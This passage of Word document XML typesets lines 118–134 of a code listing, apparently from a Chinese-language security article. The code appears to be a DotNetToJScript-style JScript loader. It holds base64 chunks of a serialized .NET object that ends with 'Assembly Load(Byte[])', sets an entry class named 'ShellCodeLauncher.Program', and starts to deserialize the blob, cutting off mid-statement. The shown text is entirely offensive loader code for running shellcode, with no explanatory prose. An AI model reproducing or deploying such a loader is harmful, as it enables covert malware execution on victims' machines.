          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AGwAAAAA"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="163"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119</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"ADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADAALgAwAC4AMAAuADAA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AAA4AAgA"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="148"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120</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"AQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMAAuADAALgAwAC4AMAAA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AAAAAAAA"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="163"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121</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"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AAAAAAAA"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="148"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122</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"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AAAAAAAA"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="163"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123</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"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AAAAAAAA"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="148"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124</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"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AAAAAAAA"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="163"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125</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"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AAAAAAAA"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="148"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126</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"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AAAAAAAA"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="163" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="235" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="1369" w:firstLine="-15"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>127</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="49"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"AAAAAAAAAAAAAAAAAAAAAAABDQAAAAQAAAAJFwAAAAkGAAAACRYAAAAGGgAAACdTeXN0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ZW0uUmVm"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="141" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>128</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="90"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"bGVjdGlvbi5Bc3NlbWJseSBMb2FkKEJ5dGVbXSkIAAAACgsA"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="19"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="129" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="4130" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>129</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>entry_class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="16"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'ShellCodeLauncher.Program'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="29"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>130</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="43" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>131</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="13"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>try</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="14"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="114" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>132</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="dc4867"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>setversion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="14"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="129" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>133</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>stm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="dc4867"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>base64ToStream</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="14"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>serialized_obj</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="13"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="121" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="235" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="1489" w:firstLine="-15"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>134</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>fmt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
